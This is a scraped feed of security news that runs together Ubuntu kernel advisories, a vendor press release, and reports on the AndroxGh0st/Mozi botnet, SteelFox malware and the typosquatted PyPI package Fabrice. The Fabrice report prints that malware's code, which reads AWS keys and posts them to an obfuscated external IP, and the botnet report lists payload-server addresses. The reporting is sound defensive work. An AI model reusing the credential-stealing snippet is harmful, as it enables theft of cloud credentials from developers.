CVE-2024-43846, CVE-2024-43849,  CVE-2024-43853, CVE-2024-43854, CVE-2024-43856, CVE-2024-43858,  CVE-2024-43860, CVE-2024-43861, CVE-2024-43863, CVE-2024-43867,  CVE-2024-43869, CVE-2024-43870, CVE-2024-43871, CVE-2024-43873,  CVE-2024-43875, CVE-2024-43879, CVE-2024-43880, CVE-2024-43882,  CVE-2024-43883, CVE-2024-43884, CVE-2024-43889, CVE-2024-43890,  CVE-2024-43892, CVE-2024-43893, CVE-2024-43894, CVE-2024-43902,  CVE-2024-43905, CVE-2024-43907, CVE-2024-43908, CVE-2024-43909,  CVE-2024-43914, CVE-2024-44934, CVE-2024-44935, CVE-2024-44944,  CVE-2024-44946, CVE-2024-44947, CVE-2024-44948, CVE-2024-44952,  CVE-2024-44954, CVE-2024-44958, CVE-2024-44960, CVE-2024-44965,  CVE-2024-44966, CVE-2024-44969, CVE-2024-44971, CVE-2024-44974,  CVE-2024-44982, CVE-2024-44983, CVE-2024-44985, CVE-2024-44986,  CVE-2024-44987, CVE-2024-44988, CVE-2024-44989, CVE-2024-44990,  CVE-2024-44995, CVE-2024-44998, CVE-2024-44999, CVE-2024-45003,  CVE-2024-45006, CVE-2024-45007, CVE-2024-45008, CVE-2024-45009,  CVE-2024-45011, CVE-2024-45018, CVE-2024-45021, CVE-2024-45025,  CVE-2024-45026, CVE-2024-45028, CVE-2024-46673, CVE-2024-46675,  CVE-2024-46676, CVE-2024-46677, CVE-2024-46679, CVE-2024-46685,  CVE-2024-46689, CVE-2024-46702, CVE-2024-46707, CVE-2024-46713,  CVE-2024-46714, CVE-2024-46719, CVE-2024-46721, CVE-2024-46722,  CVE-2024-46723, CVE-2024-46724, CVE-2024-46725, CVE-2024-46731,  CVE-2024-46732, CVE-2024-46737, CVE-2024-46738, CVE-2024-46739,  CVE-2024-46740, CVE-2024-46743, CVE-2024-46744, CVE-2024-46745,  CVE-2024-46746, CVE-2024-46747, CVE-2024-46750, CVE-2024-46752,  CVE-2024-46755, CVE-2024-46756, CVE-2024-46757, CVE-2024-46758,  CVE-2024-46759, CVE-2024-46761, CVE-2024-46763, CVE-2024-46771,  CVE-2024-46777, CVE-2024-46780, CVE-2024-46781, CVE-2024-46782,  CVE-2024-46783, CVE-2024-46791, CVE-2024-46795, CVE-2024-46798,  CVE-2024-46800, CVE-2024-46804, CVE-2024-46805, CVE-2024-46807,  CVE-2024-46810, CVE-2024-46814, CVE-2024-46815, CVE-2024-46817,  CVE-2024-46818, CVE-2024-46819, CVE-2024-46822, CVE-2024-46828,  CVE-2024-46829, CVE-2024-46832, CVE-2024-46840, CVE-2024-46844,  CVE-2024-47659, CVE-2024-47660, CVE-2024-47663, CVE-2024-47665,  CVE-2024-47667, CVE-2024-47668, CVE-2024-47669Package Information:  https://launchpad.net/ubuntu/+source/linux/5.15.0-125.135  https://launchpad.net/ubuntu/+source/linux-gcp/5.15.0-1071.79  https://launchpad.net/ubuntu/+source/linux-gke/5.15.0-1069.75  https://launchpad.net/ubuntu/+source/linux-gkeop/5.15.0-1055.62  https://launchpad.net/ubuntu/+source/linux-ibm/5.15.0-1065.68  https://launchpad.net/ubuntu/+source/linux-kvm/5.15.0-1069.74  https://launchpad.net/ubuntu/+source/linux-lowlatency/5.15.0-125.135  https://launchpad.net/ubuntu/+source/linux-nvidia/5.15.0-1067.68  https://launchpad.net/ubuntu/+source/linux-oracle/5.15.0-1070.76  https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1065.68  https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.15.0-1038.42  https://launchpad.net/ubuntu/+source/linux-aws-5.15/5.15.0-1072.78~20.04.1  https://launchpad.net/ubuntu/+source/linux-gcp-5.15/5.15.0-1071.79~20.04.1  https://launchpad.net/ubuntu/+source/linux-gkeop-5.15/5.15.0-1055.62~20.04.1  https://launchpad.net/ubuntu/+source/linux-hwe-5.15/5.15.0-125.135~20.04.1  https://launchpad.net/ubuntu/+source/linux-ibm-5.15/5.15.0-1065.68~20.04.1  https://launchpad.net/ubuntu/+source/linux-lowlatency-hwe-5.15/5.15.0-125.135~20.04.1  https://launchpad.net/ubuntu/+source/linux-oracle-5.15/5.15.0-1070.76~20.04.1

Ubuntu Security Notice USN-7100-1

TEL AVIV, Israel, 11th November 2024, CyberNewsWire

**TEL AVIV, Israel, November 11th, 2024, CyberNewsWire**

Customers can now easily integrate Sweet’s runtime detection and response platform into their AWS environments

Sweet Security today announced the availability of its cloud-native detection and response platform on the Amazon Web Services (AWS) marketplace. Sweet’s solution unifies threat detection across cloud infrastructure, network, workloads, and applications. It provides deep runtime context that enables security teams to quickly extract actual attack narratives from a sea of isolated incidents. Using Sweet, AWS Marketplace customers can detect active threats in real time and respond to them within minutes, enabling them to resolve threats with unprecedented speed – 2-5 minute MTTR – and maintain an agile and resilient environment.

AWS customers visiting AWS re:Invent 2024 in Las Vegas can book a meeting to learn more here.

> “Cloud environments are noisy and complex, making them fertile grounds for attackers — deterring them requires detection and response capabilities that, to date, have been aspirational, but we’ve made them table stakes,” said Eyal Fisher, Co-Founder and Chief Product Officer of Sweet Security and former head of the Cyber Operation Center, Unit 8200 (Col., retired). “We’re delighted that our solution is now available to AWS Marketplace customers and look forward to helping them simplify the burden of cloud security and do their jobs faster and better.” 

**What Makes Sweet so Sweet?**

Sweet Security offers detection and response for cloud native environments. Its approach is unique in how it unifies detection across cloud infrastructure, network, workloads, and applications, providing deep runtime context that cuts through the noise and delivers actual attack narratives.

Key Features include:

●     Advanced threat detection and incident response (IR) across infrastructure, network, application, and workload levels.

●     Vulnerability management enriched with runtime insights, reducing CVEs by 99% and putting only the critical risks in front of security personnel.

●     Lean sensor technology that requires minimal resources (50 MB RAM, 0.20% CPU per node) and take only minutes to deploy

●     30+ out-of-the-box integrations with SIEM, SOAR, notification and ticketing systems, and mor

Sweet empowers security teams to achieve a Mean Time to Detect of 30 seconds (MTTD) and a 2-5 minute Mean Time to Resolve (MTTR), transforming cloud security into a more proactive and effective discipline.

For more information, users can visit Sweet Security on the AWS Marketplace.

**About Sweet Security**

Specializing in Cloud Native Detection & Response (D&R), Sweet Security protects cloud environments in real time. Founded by the IDF’s former CISO, Sweet’s solution focuses on the relationships between cloud infrastructure, workloads and applications , as well as network, and identity components. Leveraging a lean, eBPF-based sensor and deep behavioral analysis, Sweet analyzes anomalies, generating vital insights on incidents, vulnerabilities, and non-human identities. Its GenAI-infused technology cuts through the noise and delivers actionable recommendations on critical, real-time cloud risks. Privately funded, Sweet is backed by Evolution Equity Partners, Munich Re Ventures, Glilot Capital Partners, CyberArk Ventures and an elite group of angel investors. For more information, please visit http://sweet.security.

**Contact**

**Account Director**  
**Chloe Amante**  
**Montner Tech PR**  
**\[email protected\]**

Sweet Security Announces Availability of its Cloud Native Detection & Response Platform on the AWS Marketplace

A significant amount of vulnerabilities in the Linux kernel have been resolved that include use-after-free and race conditions.

    Linux kernel vulnerabilitiesA security issue affects these releases of Ubuntu and its derivatives:-   Ubuntu 20.04 LTS-   Ubuntu 18.04 LTS-   Ubuntu 16.04 LTS-   Ubuntu 22.04 LTS-   Ubuntu 14.04 LTSSummarySeveral security issues were fixed in the kernel.Software Description-   linux - Linux kernel-   linux-aws - Linux kernel for Amazon Web Services (AWS) systems-   linux-azure - Linux kernel for Microsoft Azure Cloud systems-   linux-gcp - Linux kernel for Google Cloud Platform (GCP) systems-   linux-gke - Linux kernel for Google Container Engine (GKE) systems-   linux-gkeop - Linux kernel for Google Container Engine (GKE) systems-   linux-ibm - Linux kernel for IBM cloud systems-   linux-oracle - Linux kernel for Oracle Cloud systemsDetailsIn the Linux kernel, the following vulnerability has been resolved:inet: inet_defrag: prevent sk release while still in use ip_local_out()and other functions can pass skb->sk as function argument. If the skb isa fragment and reassembly happens before such function call returns, thesk must not be released. This affects skb fragments reassembled vianetfilter or similar modules, e.g. openvswitch or ct_act.c, when run aspart of tx pipeline. Eric Dumazet made an initial analysis of this bug.Quoting Eric: Calling ip_defrag() in output path is also implyingskb_orphan(), which is buggy because output path relies on sk notdisappearing. A relevant old patch about the issue was : 8282f27449bf(“inet: frag: Always orphan skbs inside ip_defrag()”) [..net/ipv4/ip_output.c depends on skb->sk being set, and probably to aninet socket, not an arbitrary one. If we orphan the packet in ipvlan,then downstream things like FQ packet scheduler will not work properly.We need to change ip_defrag() to only use skb_orphan() when reallyneeded, ie whenever frag_list is going to be used. Eric suggested tostash sk in fragment queue and made an initial patch. However there is aproblem with this: If skb is refragmented again right after,ip_do_fragment() will copy head->sk to the new fragments, and sets updestructor to sock_wfree. IOW, we have no choice but to fix up sk_wmemaccouting to reflect the fully reassembled skb, else wmem willunderflow. This change moves the orphan down into the core, to lastpossible moment. As ip_defrag_offset is aliased with sk_buff->sk member,we must move the offset into the FRAG_CB, else skb->sk gets clobbered.This allows to delay the orphaning long enough to learn if the skb hasto be queued or if the skb is completing the reasm queue. In the formercase, things work as before, skb is orphaned. This is safe because skbgets queued/stolen and won’t continue past reasm engine. In the lattercase, we will steal the skb->sk reference, reattach it to the head skb,and fix up wmem accouting when inet_frag inflates truesize.(CVE-2024-26921)In the Linux kernel, the following vulnerability has been resolved:af_unix: Fix garbage collector racing against connect() Garbagecollector does not take into account the risk of embryo getting enqueuedduring the garbage collection. If such embryo has a peer that carriesSCM_RIGHTS, two consecutive passes of scan_children() may see adifferent set of children. Leading to an incorrectly elevated inflightcount, and then a dangling pointer within the gc_inflight_list. socketsare AF_UNIX/SOCK_STREAM S is an unconnected socket L is a listeningin-flight socket bound to addr, not in fdtable V’s fd will be passed viasendmsg(), gets inflight count bumped connect(S, addr) sendmsg(S, [V]);close(V) __unix_gc() —————- ————————- ———– NS = unix_create1() skb1 =sock_wmalloc(NS) L = unix_find_other(addr) unix_state_lock(L)unix_peer(S) = NS // V count=1 inflight=0 NS = unix_peer(S) skb2 =sock_alloc() skb_queue_tail(NS, skb2[V]) // V became in-flight // Vcount=2 inflight=1 close(V) // V count=1 inflight=1 // GC candidatecondition met for u in gc_inflight_list: if (total_refs ==inflight_refs) add u to gc_candidates // gc_candidates={L, V} for u ingc_candidates: scan_children(u, dec_inflight) // embryo (skb1) was not// reachable from L yet, so V’s // inflight remains unchanged__skb_queue_tail(L, skb1) unix_state_unlock(L) for u in gc_candidates:if (u.inflight) scan_children(u, inc_inflight_move_tail) // V count=1inflight=2 (!) If there is a GC-candidate listening socket, lock/unlockits state. This makes GC wait until the end of any ongoing connect() tothat socket. After flipping the lock, a possibly SCM-laden embryo isalready enqueued. And if there is another embryo coming, it can notpossibly carry SCM_RIGHTS. At this point, unix_inflight() can not happenbecause unix_gc_lock is already taken. Inflight graph remainsunaffected. (CVE-2024-26923)In the Linux kernel, the following vulnerability has been resolved: mm:swap: fix race between free_swap_and_cache() and swapoff() There waspreviously a theoretical window where swapoff() could run and teardown aswap_info_struct while a call to free_swap_and_cache() was running inanother thread. This could cause, amongst other bad possibilities,swap_page_trans_huge_swapped() (called by free_swap_and_cache()) toaccess the freed memory for swap_map. This is a theoretical problem andI haven’t been able to provoke it from a test case. But there has beenagreement based on code review that this is possible (see link below).Fix it by using get_swap_device()/put_swap_device(), which will stallswapoff(). There was an extra check in _swap_info_get() to confirm thatthe swap entry was not free. This isn’t present in get_swap_device()because it doesn’t make sense in general due to the race between gettingthe reference and swapoff. So I’ve added an equivalent check directly infree_swap_and_cache(). Details of how to provoke one possible issue(thanks to David Hildenbrand for deriving this): –8<—–__swap_entry_free() might be the last user and result in “count ==SWAP_HAS_CACHE”. swapoff->try_to_unuse() will stop as soon as soon assi->inuse_pages==0. So the question is: could someone reclaim the folioand turn si->inuse_pages==0, before we completedswap_page_trans_huge_swapped(). Imagine the following: 2 MiB folio inthe swapcache. Only 2 subpages are still references by swap entries.Process 1 still references subpage 0 via swap entry. Process 2 stillreferences subpage 1 via swap entry. Process 1 quits. Callsfree_swap_and_cache(). -> count == SWAP_HAS_CACHE [then, preempted inthe hypervisor etc.] Process 2 quits. Calls free_swap_and_cache(). ->count == SWAP_HAS_CACHE Process 2 goes ahead, passesswap_page_trans_huge_swapped(), and calls __try_to_reclaim_swap().__try_to_reclaim_swap()->folio_free_swap()->delete_from_swap_cache()->put_swap_folio()->free_swap_slot()->swapcache_free_entries()->swap_entry_free()->swap_range_free()-> … WRITE_ONCE(si->inuse_pages,si->inuse_pages - nr_entries); What stops swapoff to succeed afterprocess 2 reclaimed the swap cache but before process1 finished its callto swap_page_trans_huge_swapped()? –8<—– (CVE-2024-26960)In the Linux kernel, the following vulnerability has been resolved:Bluetooth: Fix use-after-free bugs caused by sco_sock_timeout When thesco connection is established and then, the sco socket is releasing,timeout_work will be scheduled to judge whether the sco disconnection istimeout. The sock will be deallocated later, but it is dereferencedagain in sco_sock_timeout. As a result, the use-after-free bugs willhappen. The root cause is shown below: Cleanup Thread | Worker Threadsco_sock_release | sco_sock_close | __sco_sock_close |sco_sock_set_timer | schedule_delayed_work | sco_sock_kill | (wait atime) sock_put(sk) //FREE | sco_sock_timeout | sock_hold(sk) //USE TheKASAN report triggered by POC is shown below: [ 95.890016================================================================== [95.890496] BUG: KASAN: slab-use-after-free insco_sock_timeout+0x5e/0x1c0 [ 95.890755] Write of size 4 at addrffff88800c388080 by task kworker/0:0/7 … [ 95.890755] Workqueue: eventssco_sock_timeout [ 95.890755] Call Trace: [ 95.890755][ 95.890755] dump_stack_lvl+0x45/0x110 [ 95.890755]print_address_description+0x78/0x390 [ 95.890755print_report+0x11b/0x250 [ 95.890755] ? __virt_addr_valid+0xbe/0xf0 [95.890755] ? sco_sock_timeout+0x5e/0x1c0 [ 95.890755kasan_report+0x139/0x170 [ 95.890755] ? update_load_avg+0xe5/0x9f0 [95.890755] ? sco_sock_timeout+0x5e/0x1c0 [ 95.890755kasan_check_range+0x2c3/0x2e0 [ 95.890755] sco_sock_timeout+0x5e/0x1c0 [95.890755] process_one_work+0x561/0xc50 [ 95.890755worker_thread+0xab2/0x13c0 [ 95.890755] ? pr_cont_work+0x490/0x490 [95.890755] kthread+0x279/0x300 [ 95.890755] ? pr_cont_work+0x490/0x490 [95.890755] ? kthread_blkcg+0xa0/0xa0 [ 95.890755]ret_from_fork+0x34/0x60 [ 95.890755] ? kthread_blkcg+0xa0/0xa0 [95.890755 ret_from_fork_asm+0x11/0x20 [ 95.890755][ 95.890755] [ 95.890755 Allocated by task 506: [ 95.890755]kasan_save_track+0x3f/0x70 [ 95.890755 __kasan_kmalloc+0x86/0x90 [95.890755] __kmalloc+0x17f/0x360 [ 95.890755 sk_prot_alloc+0xe1/0x1a0 [95.890755] sk_alloc+0x31/0x4e0 [ 95.890755 bt_sock_alloc+0x2b/0x2a0 [95.890755] sco_sock_create+0xad/0x320 [ 95.890755]bt_sock_create+0x145/0x320 [ 95.890755 __sock_create+0x2e1/0x650 [95.890755] __sys_socket+0xd0/0x280 [ 95.890755__x64_sys_socket+0x75/0x80 [ 95.890755] do_syscall_64+0xc4/0x1b0 [95.890755] entry_SYSCALL_64_after_hwframe+0x67/0x6f [ 95.890755] [95.890755] Freed by task 506: [ 95.890755] kasan_save_track+0x3f/0x70 [95.890755] kasan_save_free_info+0x40/0x50 [ 95.890755poison_slab_object+0x118/0x180 [ 95.890755] __kasan_slab_free+0x12/0x30[ 95.890755] kfree+0xb2/0x240 [ 95.890755] __sk_destruct+0x317/0x410 [95.890755] sco_sock_release+0x232/0x280 [ 95.890755]sock_close+0xb2/0x210 [ 95.890755] __fput+0x37f/0x770 [ 95.890755]task_work_run+0x1ae/0x210 [ 95.890755] get_signal+0xe17/0xf70 [95.890755 arch_do_signal_or_restart+0x3f/0x520 [ 95.890755syscall_exit_to_user_mode+0x55/0x120 [ 95.890755]do_syscall_64+0xd1/0x1b0 [ 95.890755]entry_SYSCALL_64_after_hwframe+0x67/0x6f [ 95.890755] [ 95.890755] Thebuggy address belongs to the object at ffff88800c388000 [ 95.890755]which belongs to the cache kmalloc-1k of size 1024 [ 95.890755 The buggyaddress is located 128 bytes inside of [ 95.890755] freed 1024-byteregion [ffff88800c388000, ffff88800c388400) [ 95.890755] [ 95.890755]The buggy address belongs to the physical page: [ 95.890755 page:refcount:1 mapcount:0 mapping:0000000000000000 index:0xffff88800c38a800pfn:0xc388 [ 95.890755] head: order:3 entire_mapcount:0nr_pages_mapped:0 pincount:0 [ 95.890755] ano —truncated—(CVE-2024-27398)In the Linux kernel, the following vulnerability has been resolved:watchdog: cpu5wdt.c: Fix use-after-free bug caused by cpu5wdt_triggerWhen the cpu5wdt module is removing, the origin code uses del_timer() tode-activate the timer. If the timer handler is running, del_timer()could not stop it and will return directly. If the port region isreleased by release_region() and then the timer handlercpu5wdt_trigger() calls outb() to write into the region that isreleased, the use-after-free bug will happen. Change del_timer() totimer_shutdown_sync() in order that the timer handler could be finishedbefore the port region is released. (CVE-2024-38630)Update instructionsThe problem can be corrected by updating your kernel livepatch to thefollowing versions:Ubuntu 20.04 LTS    aws - 107.1    aws - 107.2    azure - 107.1    azure - 107.2    gcp - 107.1    gcp - 107.2    generic - 107.1    generic - 107.2    gke - 107.1    gkeop - 107.1    gkeop - 107.2    ibm - 107.1    ibm - 107.2    lowlatency - 107.1    lowlatency - 107.2    oracle - 107.1    oracle - 107.2Ubuntu 18.04 LTS    aws - 107.1    aws - 107.2    azure - 107.1    azure - 107.2    gcp - 107.1    gcp - 107.2    generic - 107.1    generic - 107.2    lowlatency - 107.1    lowlatency - 107.2    oracle - 107.1    oracle - 107.2Ubuntu 16.04 LTS    aws - 107.1    aws - 107.2    azure - 107.1    azure - 107.2    gcp - 107.1    gcp - 107.2    generic - 107.1    generic - 107.2    lowlatency - 107.1    lowlatency - 107.2Ubuntu 22.04 LTS    aws - 107.1    aws - 107.2    azure - 107.1    azure - 107.2    gcp - 107.1    gcp - 107.2    generic - 107.1    generic - 107.2    gke - 107.1    gke - 107.2    ibm - 107.1    ibm - 107.2    oracle - 107.1Ubuntu 14.04 LTS    generic - 107.1    lowlatency - 107.1Support InformationLivepatches for supported LTS kernels will receive upgrades for a periodof up to 13 months after the build date of the kernel.Livepatches for supported HWE kernels which are not based on an LTSkernel version will receive upgrades for a period of up to 9 monthsafter the build date of the kernel, or until the end of support for thatkernel’s non-LTS distro release version, whichever is sooner.References-   CVE-2024-26921-   CVE-2024-26923-   CVE-2024-26960-   CVE-2024-27398-   CVE-2024-38630

Kernel Live Patch Security Notice LSN-0107-1

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.
"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a

IoT Security / Vulnerability

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.

"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a new report.

AndroxGh0st is the name given to a Python-based cloud attack tool that's known for its targeting of Laravel applications with the goal of sensitive data pertaining to services like Amazon Web Services (AWS), SendGrid, and Twilio.

Active since at least 2022, it has previously leveraged flaws in the Apache web server (CVE-2021-41773), Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access, escalate privileges, and establish persistent control over compromised systems.

Earlier this March, U.S. cybersecurity and intelligence agencies revealed that attackers are deploying the AndroxGh0st malware to create a botnet for "victim identification and exploitation in target networks."

The latest analysis from CloudSEK reveals a strategic expansion of the targeting focus, with the malware now exploiting an array of vulnerabilities for initial access -

*   CVE-2014-2120 (CVSS score: 4.3) - Cisco ASA WebVPN login page XSS vulnerability
*   CVE-2018-10561 (CVSS score: 9.8) - Dasan GPON authentication bypass vulnerability
*   CVE-2018-10562 (CVSS score: 9.8) - Dasan GPON command injection vulnerability
*   CVE-2021-26086 (CVSS score: 5.3) - Atlassian Jira path traversal vulnerability
*   CVE-2021-41277 (CVSS score: 7.5) - Metabase GeoJSON map local file inclusion vulnerability
*   CVE-2022-1040 (CVSS score: 9.8) - Sophos Firewall authentication bypass vulnerability
*   CVE-2022-21587 (CVSS score: 9.8) - Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability
*   CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability
*   CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability
*   CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability

"The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said. "The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings."

The attacks have also been observed leveraging unauthenticated command execution flaws in Netgear DGN devices and Dasan GPON home routers to drop a payload named "Mozi.m" from different external servers ("200.124.241\[.\]140" and "117.215.206\[.\]216").

Mozi is another well-known botnet that has a track record of striking IoT devices to co-opt them into a malicious network for conducting distributed denial-of-service (DDoS) attacks.

While the malware authors were arrested by Chinese law enforcement officials in September 2021, a precipitous decline in Mozi activity wasn't observed until August 2023, when unidentified parties issued a kill switch command to terminate the malware. It's suspected that either the botnet creators or Chinese authorities distributed an update to dismantle it.

AndroxGh0st's integration of Mozi has raised the possibility of a possible operational alliance, thereby allowing it to propagate to more devices than ever before.

"AndroxGh0st is not just collaborating with Mozi but embedding Mozi's specific functionalities (e.g., IoT infection and propagation mechanisms) into its standard set of operations," CloudSEK said.

"This would mean that AndroxGh0st has expanded to leverage Mozi's propagation power to infect more IoT devices, using Mozi's payloads to accomplish goals that otherwise would require separate infection routines."

"If both botnets are using the same command infrastructure, it points to a high level of operational integration, possibly implying that both AndroxGh0st and Mozi are under the control of the same cybercriminal group. This shared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and efficiency of their combined botnet operations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

SteelFox malware targets software pirates through fake activation tools, stealing credit card data and deploying crypto miners. Learn…

SteelFox malware targets software pirates through fake activation tools, stealing credit card data and deploying crypto miners. Learn about this new threat affecting users worldwide and how to protect yourself from this sophisticated cybercrime campaign.

Cybersecurity researchers at Securelist have identified a new type of malware that has been spreading through online forums, torrent trackers, and blogs, posing as legitimate software like Foxit PDF Editor, AutoCAD, and JetBrains.

Dubbed “SteelFox” by researchers; the malware’s main targets are those Microsft Windows users who are involved in downloading pirated software and fake software activation tools (cracks).

The campaign, which began in February 2023, combines cryptocurrency mining and data stealing capabilities through fake software activation tools. So far, the malware has infected over 11,000 users worldwide.

According to Securelist’s **blog post** shared with Hackread.com ahead of publishing, SteelFox is a full-featured _“_crimeware bundle_“_ that extracts sensitive data from infected devices, including credit card information, browsing history, and login credentials. It also collects system information, such as installed software, running services, and network configurations.

The malware’s initial attack vector involves fake software activators, which are advertised on online forums and torrent trackers as a way to activate legitimate software for free. Once installed, the malware creates a service that stays on the system, even after reboots and uses a vulnerable driver to advance its privileges.

Malicious dropper advertisement (Via Securelist)

The malware operates through a multi-stage attack chain, beginning with a dropper that requires administrator privileges. Once executed, it installs itself as a Windows service and uses AES-128 encryption to hide its components. The malware achieves system-level access by exploiting vulnerable drivers and implements TLS 1.3 with SSL pinning for secure communication with its command servers.

> _“SteelFox’s Highly sophisticated usage of modern C++ combined with external libraries grants this malware formidable power. Usage of TLSv1.3 and SSL pinning ensures secure communication and harvesting of sensitive data.”_
> 
> Securelist

****Global Impact****

SteelFox does not appear to target specific individuals or organizations, instead operating on a larger scale to infect as many users as possible. The malware has already infected users in over 10 countries, including the following:

*   **UAE**
*   **India**
*   **Brazil**
*   **China**
*   **Russia**
*   **Egypt**
*   **Algeria**
*   **Mexico**
*   **Vietnam**
*   **Sri Lanka**

James McQuiggan, a security awareness advocate at **KnowBe4**, emphasized the importance of organizations being cautious about the sources of their software downloads. He also highlighted the necessity of training employees through cybersecurity awareness programs.

“The dual functionality of SteelFox’s droppers—providing both software “cracks” and malware indicates the complex tools used by cybercriminals and using an outdated driver for privilege escalation highlights the critical need for organizations to ensure they are implementing patches.”

“Organizations must ensure they verify software sources, maintain the least user privilege access control, and leverage endpoint protection to detect suspicious installation behaviours,” James explained.

“Furthermore and more importantly, ensure that cybersecurity awareness programs are provided to users about the dangers of unverified software, like open source software or these common applications. Allow for an IT-managed software solution to install and monitor all applications,” he advised.

****Protecting Yourself from SteelFox****

To avoid becoming victims of SteelFox, users should only download software from official sources and use a **reliable security solution** that can detect and prevent the installation of infected software. Additionally, users should be cautious when clicking links or downloading attachments from unknown sources, as these can often be used to spread malware.

1.  **Winos4.0 Malware Targeting Windows via Fake Gaming Apps**
2.  **Fabrice Malware on PyPI Stealing AWS Credentials for 3 Years**
3.  **SideWinder hit Android users with malware apps on Play Store**
4.  **TodoSwift Malware Targets macOS, Disguised as Bitcoin PDF App**
5.  **Octo2 Malware Uses Fake NordVPN Apps to Infect Android Phones**

New SteelFox Malware Posing as Popular Software to Steal Browser Data

The malicious Python package “Fabrice” on PyPI mimics the “Fabric” library to steal AWS credentials, affecting thousands. Learn how…

The malicious Python package _“Fabrice”_ on PyPI mimics the _“Fabric”_ library to steal AWS credentials, affecting thousands. Learn how it works and protect your projects with smart security practices.

Cybersecurity researchers at Socket Security have identified a malicious Python package named “Fabrice” on the Python Package Index (PyPI), which has been actively harvesting Amazon Web Services (**AWS**) credentials from unsuspecting developers for the past three years.

This package, which mimics the legitimate and widely-used “fabric” library for SSH command execution has over 202 million downloads, the malicious version has been downloaded over 37,000 times since it surfaced in 2021.

****Typosquatting****

The malicious Fabrice package is designed to exploit the trust associated with the genuine “fabric” library. This technique is called **typosquatting** in which scammers take advantage of situations in which users mistype the name of the popular “fabric” package.

The malware includes payloads that steal credentials, install backdoors, and execute additional platform-specific scripts. The scammers behind the package are particularly interested in Amazon Web Services (AWS) credentials. Currently, the attackers are targeting users and developers on Windows and Linux devices.

****Targeting Linux and Windows Devices****

On Linux, the malware creates hidden directories within the user’s home directory to store and run scripts downloaded from a remote server. These scripts are designed to hide their activity, making detection quite difficult.

On Windows, it uses VBScript to run hidden Python scripts, which in turn download malicious executables. These executables are then scheduled to run repeatedly, assuring persistence on the infected system. The malware also attempts to delete its initial entry point to cover its tracks.

****Stolen Credentials Sent to Paris****

In its **report** shared with Hackread.com ahead of publishing, both methods lead to the extraction of AWS credentials, sending them to a server located in Paris, operated by M247, a VPN service provider. This could allow attackers to abuse these credentials for unauthorized access to cloud resources. What’s worse, the campaign remains active despite researchers’ alerts to PyPI.

****Example of AWS Credential Exfiltration****

session = boto3.Session()  
cd = session.get_credentials()  
ak = cd.access_key  
sk = cd.secret_key  
data = {"k": ak, "s": sk}  
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"  
requests.post(muri, json=data, timeout=4

> _“Recognizing the severe risk fabrice poses, our team has proactively reported it to the PyPI team for takedown to safeguard the broader developer community. It is still live at the time of publishing.”_
> 
> Socket Security

Rom Carmel, Co-Founder and CEO of Identity Security platform **Apono** weighed in on the latest development stating, _“_Malicious actors continue to find success by putting malicious software packages out into the developer community, playing a numbers game that a percentage of developers will make the very human mistake of choosing the wrong package for their code._“_

_“_While methods like improving security awareness education and implementing processes for secure coding can go a long way in helping developers to make more secure decisions as we see with phishing, security teams need to take steps to secure their organizations from an assumed breach approach,_“_ Rom warned.

_“_To protect your organization once credentials are compromised as we see on a near daily basis, we need to think in terms of defence in depth. That means implementing not only MFA but also reducing the blast radius from an account takeover in terms of the availability of access and the scope of privileges that attackers can use,_“_ he advised.

****Additional Security Measures for Developers****

Developers are the backbone of any project. The information that can be extracted from them can become a treasure trove if it falls into the wrong hands. Lately, **Python developers, in particular**, have been heavily targeted by threat actors. Here are some tips to protect your data and accounts from hackers and malware attacks:

*   **Stay Informed**: Keep yourself up-to-date about security advisories from platforms like PyPI. Community reports and security research blogs can be valuable in staying protected against threats like Fabrice.
*   **Double-check for typosquatting:** Always double-check the names of packages before installation. Look for signs of typosquatting like slight misspellings or unusual publisher names.
*   **Use Security Tools**: Employ tools like Socket for GitHub, which provides real-time monitoring and security checks for dependencies in your projects. Such tools can automatically detect and alert suspicious activities or known malicious packages.
*   **Regular Security Audits**: Regularly review and audit the software dependencies of your projects. Make sure that all packages are from trusted sources and serve a legitimate purpose.
*   **Follow Hackread.com:** Most importantly, follow Hackread.com.

1.  **Why is learning Python important in Data Science?**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
4.  **NTLM Credential Theft in Python Apps Threaten Windows Security**
5.  **Python in Threat Intelligence: Analyzing – Mitigating Cyber Threats**

Fabrice Malware on PyPI Has Been Stealing AWS Credentials for 3 Years

Ubuntu Security Notice 7088-4 - Ziming Zhang discovered that the VMware Virtual GPU DRM driver in the Linux kernel contained an integer overflow vulnerability. A local attacker could use this to cause a denial of service. Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

